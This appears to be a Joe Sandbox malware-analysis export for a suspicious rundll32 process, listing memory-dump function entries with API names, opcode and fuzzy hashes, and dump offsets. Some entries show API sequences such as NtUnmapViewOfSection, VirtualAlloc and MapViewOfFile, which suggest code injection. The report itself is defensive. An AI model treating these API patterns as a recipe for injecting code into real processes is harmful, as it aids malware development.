                                      • API String ID: 1263568516-970779948
                                      • Opcode ID: 872aeec84cbaeb3725683b3f97cc31e77a18b92113d903afa561b5ea92fb0226
                                      • Instruction ID: 4b86850cc4e494263979e949f9b434579947d2adcff14636be7afc1ae031c2d1
                                      • Opcode Fuzzy Hash: 872aeec84cbaeb3725683b3f97cc31e77a18b92113d903afa561b5ea92fb0226
                                      • Instruction Fuzzy Hash: BFD1A731A5CA488BEF64EFAD9C596BA77F1FB95300F00452AD44FC3196DE78E8818781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@_malloc_dbg
                                      • String ID: !Rcx
                                      • API String ID: 149304988-1190931699
                                      • Opcode ID: 375216cf1db1b95d5aee2b7e97bdc21f36d06a79622ee621d3fb19e0d25edae2
                                      • Instruction ID: 33fdf938c68321ae0806030aa3d30bfefa4bc9678eacdbfb2513af53f64b5572
                                      • Opcode Fuzzy Hash: 375216cf1db1b95d5aee2b7e97bdc21f36d06a79622ee621d3fb19e0d25edae2
                                      • Instruction Fuzzy Hash: 4C31B232608A884FDB64EFA9C8D86AAB7F0FB94315F10463FD48EC2191DA34D545CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: InformationOpenQueryValueVolume
                                      • String ID:
                                      • API String ID: 3064582257-0
                                      • Opcode ID: 53bae16748ecdc21ae953881b952189692968bc814a88933c73c387c58fe5f91
                                      • Instruction ID: da07405975dd2662ea1e9ca25b4bf3d21644ff5e116954e40e233e9f511fa18d
                                      • Opcode Fuzzy Hash: 53bae16748ecdc21ae953881b952189692968bc814a88933c73c387c58fe5f91
                                      • Instruction Fuzzy Hash: 68412D7111CB888BE765EF54C898BEBB7F0FB94304F404A2EE18BC2191DF7895448B42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Completion$CreateFileModesNotificationPortioctlsocket
                                      • String ID:
                                      • API String ID: 1455841399-0
                                      • Opcode ID: 2ffc94b0a21e48c42bcc45a374f0656ae988c6d857e7144060324a3055d7017d
                                      • Instruction ID: 90ed000305aaadcfe281005a19d7c48f5edf41096890c2a4c1cef8799d26cba8
                                      • Opcode Fuzzy Hash: 2ffc94b0a21e48c42bcc45a374f0656ae988c6d857e7144060324a3055d7017d
                                      • Instruction Fuzzy Hash: 0B31C3317489944BFF54AADDA8BC27A3AF5FF54315F60007AE84BC218BDE29DC818685
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CreateRead_calloc_dbg
                                      • String ID:
                                      • API String ID: 2257410078-0
                                      • Opcode ID: a5499618f628a59e0d96b57db253cb0100af634853b51a4cee71ef425f696bbf
                                      • Instruction ID: ed6115a14a69f00ae2f3e1e7c7b36cdb60c43ae790781c3340ef472217a7c34c
                                      • Opcode Fuzzy Hash: a5499618f628a59e0d96b57db253cb0100af634853b51a4cee71ef425f696bbf
                                      • Instruction Fuzzy Hash: 6611B130608A488FDB90AFA8D88C76A7BE0FB99351F14462EE94EC3290CB3899458751
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X
                                      • API String ID: 0-3081909835
                                      • Opcode ID: 5b8f89fd01ffcab5325466948f567bc44c85a99fcdafc58f93a3656588ca7363
                                      • Instruction ID: cf5f19d57574a5a9312ebf2b0440c8f8ff2e7ded93d456333722fa72f4480441
                                      • Opcode Fuzzy Hash: 5b8f89fd01ffcab5325466948f567bc44c85a99fcdafc58f93a3656588ca7363
                                      • Instruction Fuzzy Hash: 9171A272918B088FD768DF69D4991B677F4FB48710B50066FD89BC3692D734B8828B81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID: !Rex
                                      • API String ID: 1527718024-279350133
                                      • Opcode ID: c06c5c98849e9df7b0606abe95abcd386699ff6728879cc7af8d853c28d6de16
                                      • Instruction ID: ae1ae307db04ce3e5a3436834cc7890ce16b2deaadeebdac6026dea6d25ac4df
                                      • Opcode Fuzzy Hash: c06c5c98849e9df7b0606abe95abcd386699ff6728879cc7af8d853c28d6de16
                                      • Instruction Fuzzy Hash: F171323261CAC44BD776EB95C4AAAEFB7F5FF94300F10492ED48FC2186DE34A5458682
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID: <
                                      • API String ID: 1527718024-4251816714
                                      • Opcode ID: facb8d15b7ef9ec13e3b09c00d022012f8459e64aea036b22a2031390383be8b
                                      • Instruction ID: c9f254abfc5157ef9140fd0441c2a1390dae8aa9fa256a333fcc1be3fc529878
                                      • Opcode Fuzzy Hash: facb8d15b7ef9ec13e3b09c00d022012f8459e64aea036b22a2031390383be8b
                                      • Instruction Fuzzy Hash: C451E731608A484FDB18EFA9C4D58B677F1FF98304B11066EE84FC7256EA34E941CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ErrorFunctionLibraryLoadModeTable
                                      • String ID: {
                                      • API String ID: 3218182252-366298937
                                      • Opcode ID: ce8c5c31cd73c92eaa4bb109d3a5c28e0b34eac1a0d27fbc4dc84f37bbccbbdd
                                      • Instruction ID: 278fdcc996144b4b83484f72655f26cd22aab86d4c46c3ed0f5a60a100018b00
                                      • Opcode Fuzzy Hash: ce8c5c31cd73c92eaa4bb109d3a5c28e0b34eac1a0d27fbc4dc84f37bbccbbdd
                                      • Instruction Fuzzy Hash: 2701A52271CA940AE784B7FA4C262B776F5EF94321F00423AE51FC31C3ED28EC555282
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FileVirtual$AllocCreateFreeRead_malloc_dbg
                                      • String ID: MZ
                                      • API String ID: 3094449763-2410715997
                                      • Opcode ID: dc4bd1325c9b6ce831cdb2494975a3abfd7c2e64201de334ba9217b2b9306c25
                                      • Instruction ID: ed4ad43f189e16a38a4304d41d0725dfef76f9acd8bb214fb464de62a31abf1a
                                      • Opcode Fuzzy Hash: dc4bd1325c9b6ce831cdb2494975a3abfd7c2e64201de334ba9217b2b9306c25
                                      • Instruction Fuzzy Hash: C151CC32A5CA844BEFA4EB995C5967B76F1EBD5310F00056AE84FC3186DA38E8414782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320511595.0000025AA3600000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025AA3600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_25aa3600000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82552c8ceb4bd420dba5bcd59e8ddc246d38e28e5f7935b533cdb85efc16f220
                                      • Instruction ID: f4f14c3ad5e0f3b236f775bd8e42857e3eece9bc2c5717d70b29cfbb491f8bf8
                                      • Opcode Fuzzy Hash: 82552c8ceb4bd420dba5bcd59e8ddc246d38e28e5f7935b533cdb85efc16f220
                                      • Instruction Fuzzy Hash: FB51D930628A044BD75EEE58C89B57A73E1FBD5712F24C71EE487C7196EE30E902C685
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID:
                                      • API String ID: 1527718024-0
                                      • Opcode ID: 9045cd34264d0f61825811a11acd7615922ca1469bd678ead7aad3f293db595a
                                      • Instruction ID: 130ac661d892996aa7b566cf1777fbeaba2505636e1722e458b70b719c42d59e
                                      • Opcode Fuzzy Hash: 9045cd34264d0f61825811a11acd7615922ca1469bd678ead7aad3f293db595a
                                      • Instruction Fuzzy Hash: 21414731608D0E8FDB94EFA9D89CA75BBF0FB68301710462AD41AC3665DB34EC958BC0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@_calloc_dbg
                                      • String ID:
                                      • API String ID: 372180527-0
                                      • Opcode ID: 276c063e93356f39a75f1bcb39732f00e41cbb9414687fe3efb2109651a33a7a
                                      • Instruction ID: 62339f15968eab7ba7f9f6cccf13192d8d10fc224f118893c8c8c2ce1902cda6
                                      • Opcode Fuzzy Hash: 276c063e93356f39a75f1bcb39732f00e41cbb9414687fe3efb2109651a33a7a
                                      • Instruction Fuzzy Hash: F8418D32618E488FDB94EF88C495AAA77F1FF98300B500666D54AC7197CA38FD81CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressCallerLibraryLoadProc
                                      • String ID:
                                      • API String ID: 4215043672-0
                                      • Opcode ID: 360a3b14b73cf4ba8c025e592f2c7af1987442e7d978021b0d53979cebde274f
                                      • Instruction ID: 71f951ba933b426831d3778852c0f22e4c1adaa416c1caa6bae9161758014a30
                                      • Opcode Fuzzy Hash: 360a3b14b73cf4ba8c025e592f2c7af1987442e7d978021b0d53979cebde274f
                                      • Instruction Fuzzy Hash: 3D210522A0DA8D4BE7299EF99C5937637F8DB42321F04007BD84BC7193D95DF8C28291
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                      • Instruction ID: a67831136c9623a5ff4a6bfe7dac3addc0504db0ed5ee7cca6411da3dbd74004
                                      • Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                      • Instruction Fuzzy Hash: E7212371A088184FDF94EB9EC0E89757BF1EF98B507A512A1D81BC729AD525ECC187C0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: a87dd15c5b21502df9a9a1958824b3b0c87cd0723e622a5a78e91728434a00fc
                                      • Instruction ID: 9326d94ed21192ec8f8870d97dd74e6a8657029828cb66361362085847e33fc6
                                      • Opcode Fuzzy Hash: a87dd15c5b21502df9a9a1958824b3b0c87cd0723e622a5a78e91728434a00fc
                                      • Instruction Fuzzy Hash: 8D114232708D484FEF85FBA9AC999BA77B6EBE5300704452AE40BC3155DE38D9498781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Recv
                                      • String ID:
                                      • API String ID: 4192927123-0
                                      • Opcode ID: 0ed6c12643ef064cbca3101121e01caf1c0bee925d3670dd1d08c5da83a7306d
                                      • Instruction ID: eaa35f74f579441f84c4fb2f26049d14f25490c93a1d257de1548169768d21c1
                                      • Opcode Fuzzy Hash: 0ed6c12643ef064cbca3101121e01caf1c0bee925d3670dd1d08c5da83a7306d
                                      • Instruction Fuzzy Hash: E0A1A732A18B898FE7949BDD84986B6BBF1FF54314F50013AD44FC658ADB38EC918781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: b1be3cc22f8079cd234e0ae30197ecf8b34efb11fdb22abb88b5cc59e6195b50
                                      • Instruction ID: 3abb96ae819eaabc87cc6e1b8f1a048f1c8769e6f987f3a1c6401b8ac4c1e9dd
                                      • Opcode Fuzzy Hash: b1be3cc22f8079cd234e0ae30197ecf8b34efb11fdb22abb88b5cc59e6195b50
                                      • Instruction Fuzzy Hash: DA91CB7151CB888FE764EF69C4997AAB7F1FB98301F00492AE58EC3251DB34E944DB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Send
                                      • String ID:
                                      • API String ID: 121738739-0
                                      • Opcode ID: 025fd1521b03c48df47ad88bd262d16e2d3cd050fdda3960f0fce3c1fd7bbae2
                                      • Instruction ID: 24f3d36d08e04bc630504e1701c1044aae686e7f6663a9b7f3b32f68d17677ce
                                      • Opcode Fuzzy Hash: 025fd1521b03c48df47ad88bd262d16e2d3cd050fdda3960f0fce3c1fd7bbae2
                                      • Instruction Fuzzy Hash: B081C071508A458FEB98EFADC4987A2BBF1FF14314F10426AD44EC7696DB34E884CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: adb4356cc9c6a87139024e7379dcd3893e31279c0e3ba0ae376689aa6833c1b8
                                      • Instruction ID: 24bf184352179f5858eb3a327cfcf8a25a5dd3318c420f46666027839474af71
                                      • Opcode Fuzzy Hash: adb4356cc9c6a87139024e7379dcd3893e31279c0e3ba0ae376689aa6833c1b8
                                      • Instruction Fuzzy Hash: 06515E7162CB488FD748DF99D88556A7BE1FB99701F10052FE48BC2352DA34E882CB83
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Recv
                                      • String ID:
                                      • API String ID: 4192927123-0
                                      • Opcode ID: a5be54a69f3bf84269773a6cd7379ea69bad9d593bf99f2bbeacdfaef6688a3f
                                      • Instruction ID: 585ff5fd21759cee9f9ff1d6f9e9a428e7fdbbd6025103bd3345f2f11f8dddc0
                                      • Opcode Fuzzy Hash: a5be54a69f3bf84269773a6cd7379ea69bad9d593bf99f2bbeacdfaef6688a3f
                                      • Instruction Fuzzy Hash: C2515D71508A898FE7A4DFADC8A87A6BBF4FF14314F60056AD44EC3596DB39E480CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007DF4B3C22FA4: NtUnmapViewOfSection.NTDLL ref: 00007DF4B3C23034
                                        • Part of subcall function 00007DF4B3C22FA4: VirtualAlloc.KERNELBASE ref: 00007DF4B3C23056
                                        • Part of subcall function 00007DF4B3C22FA4: NtSetInformationFile.NTDLL ref: 00007DF4B3C23098
                                      • MapViewOfFile.KERNELBASE ref: 00007DF4B3C13FB7
                                        • Part of subcall function 00007DF4B3C22FA4: NtClose.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00007DF4B3C230D0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FileView$AllocCloseInformationSectionUnmapVirtual
                                      • String ID:
                                      • API String ID: 3911742341-0
                                      • Opcode ID: 502e52437849565e925d83ccf3de6c5e9e7ab8b63f1dbba070af9e040f3b2d98
                                      • Instruction ID: b010f9c57ff26042eef7acc556e0b21c85a1be9f9b798a60d810cfa217a8c899
                                      • Opcode Fuzzy Hash: 502e52437849565e925d83ccf3de6c5e9e7ab8b63f1dbba070af9e040f3b2d98
                                      • Instruction Fuzzy Hash: 4E415331608D498FEB55FBA9C4696BAB7B1FF94300F00462AE55FC3192CF39E8558B81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID:
                                      • API String ID: 1527718024-0
                                      • Opcode ID: bd9e178f38e0b91e4b85d738bcd5c00a0e2b0c53e8645be7d9516bb73a9f62d0
                                      • Instruction ID: b0df3eaf14432d5a721fcd732f21eba063a094562d37fa5163c98a6cc91ba5f0
                                      • Opcode Fuzzy Hash: bd9e178f38e0b91e4b85d738bcd5c00a0e2b0c53e8645be7d9516bb73a9f62d0
                                      • Instruction Fuzzy Hash: B631FA21A0CA8A5BE7989BED847D3B27BF1FF55310F14417AD44FC6287DA18A8CB8341
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: b321590e39003328950868adb3b7baf0a738c2a81c9ed83129ade6c1723d170f
                                      • Instruction ID: 846444fe3d3f6f7f61390c9327183cf43833226a259b8af34df7ef105ae5ce76
                                      • Opcode Fuzzy Hash: b321590e39003328950868adb3b7baf0a738c2a81c9ed83129ade6c1723d170f
                                      • Instruction Fuzzy Hash: 2731F831618D098FDF85EF59C4A8BA537B0FF59310F4841B9D80ECB29ACA39AC95CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: setsockopt
                                      • String ID:
                                      • API String ID: 3981526788-0
                                      • Opcode ID: c3d1e43800537302380f5b1396f955236f14e3c54ea5244c42555eb7a83783ad
                                      • Instruction ID: e79bb992a0125a27b8e3d4738c41ccd1bda83a14440021b2bfc64b0ab6de65a3
                                      • Opcode Fuzzy Hash: c3d1e43800537302380f5b1396f955236f14e3c54ea5244c42555eb7a83783ad
                                      • Instruction Fuzzy Hash: 9B316D71A04A458FEB98DF9DC0987617BF1FF18324F1442AAD81ACB2DADB349C85CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID:
                                      • API String ID: 1527718024-0
                                      • Opcode ID: 6791125b6041b40252ec0e29d125b26a70b6bb3ad06553c4cc4837f4d2123a91
                                      • Instruction ID: 8aea98eca284d79c1ca9375ca9cc5d96f09d3040ec9e2e441a70e1520f647727
                                      • Opcode Fuzzy Hash: 6791125b6041b40252ec0e29d125b26a70b6bb3ad06553c4cc4837f4d2123a91
                                      • Instruction Fuzzy Hash: B3218E32614D0C8FDB59EF5DD88C6B277E1EBA831170442ABD80ACB265DA25E8848B81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 844d00f62b8cf5e70495a8abac675de53b76fbb5ce2c42a1bf6d18f5a51ba4cf
                                      • Instruction ID: c12a5b4a455d3262b147a134d61df17b728cafa7f091b1956dc0af044d75644d
                                      • Opcode Fuzzy Hash: 844d00f62b8cf5e70495a8abac675de53b76fbb5ce2c42a1bf6d18f5a51ba4cf
                                      • Instruction Fuzzy Hash: 59119A32618D494EEB5497E6C89C73236B0EF44720F500276D91BC22D2DF2CDCD5DA90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _calloc_dbg.MSVCRT(?,?,?,?,?,?,-00000001,?,00000000,00007DF4B3C13945), ref: 00007DF4B3C120E1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _calloc_dbg
                                      • String ID:
                                      • API String ID: 1170608187-0
                                      • Opcode ID: c51590aacd85f655efd91063ad02dae0314de1845b802f39fd2b5bf8436abf74
                                      • Instruction ID: 514dd88d399a9e37405cfe7c2ac464732ac13e8484702d2bb9fbdc7639deb3e9
                                      • Opcode Fuzzy Hash: c51590aacd85f655efd91063ad02dae0314de1845b802f39fd2b5bf8436abf74
                                      • Instruction Fuzzy Hash: E4018032609E0C8FE754EF9AE8C86A23BF1EB68311701426BD809C7266DE34D880C7D0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320511595.0000025AA3600000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025AA3600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_25aa3600000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: f6e73972739c194d795b157926e15302b96fde7321bde8de7d486285f80fee4f
                                      • Instruction ID: a003018118bc257e968f20c07e3c45a6ae799a4c2fd9cd3de475e7d7ad4f33ad
                                      • Opcode Fuzzy Hash: f6e73972739c194d795b157926e15302b96fde7321bde8de7d486285f80fee4f
                                      • Instruction Fuzzy Hash: 2A018F71A14E195BE7A4AE289C4A36677E0FBC9356F054236A819C3281DA34DC90CBC5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,-00000001,00007DF4B3C17EC3), ref: 00007DF4B3C16E63
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 8daca81c3d0f5f89cf6fe5a3ed5ac884db543bf125681da9b4c854e5f3ab5189
                                      • Instruction ID: 54c801eadebf969bc673af5b4e5a8e1ba1b2b47247209a6d6a1c644e01fcce77
                                      • Opcode Fuzzy Hash: 8daca81c3d0f5f89cf6fe5a3ed5ac884db543bf125681da9b4c854e5f3ab5189
                                      • Instruction Fuzzy Hash: E301FB31204C4D9FDF84EB59C4D8E6577F1EB6831471446BAD40DCB246DA25EC92CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 1173c4bf6734c2ddcbf1999c0336684670098a1b8ff3ecb332de893cda3149d8
                                      • Instruction ID: fa73f821edad7d6c2502f4a653935f0b48303d3554c8b21e597b10c231954f18
                                      • Opcode Fuzzy Hash: 1173c4bf6734c2ddcbf1999c0336684670098a1b8ff3ecb332de893cda3149d8
                                      • Instruction Fuzzy Hash: 36F04931218E0A4FEB84EF9AC4DC771B7B0FB58305F60002AD10AC2190C774ACA4E700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
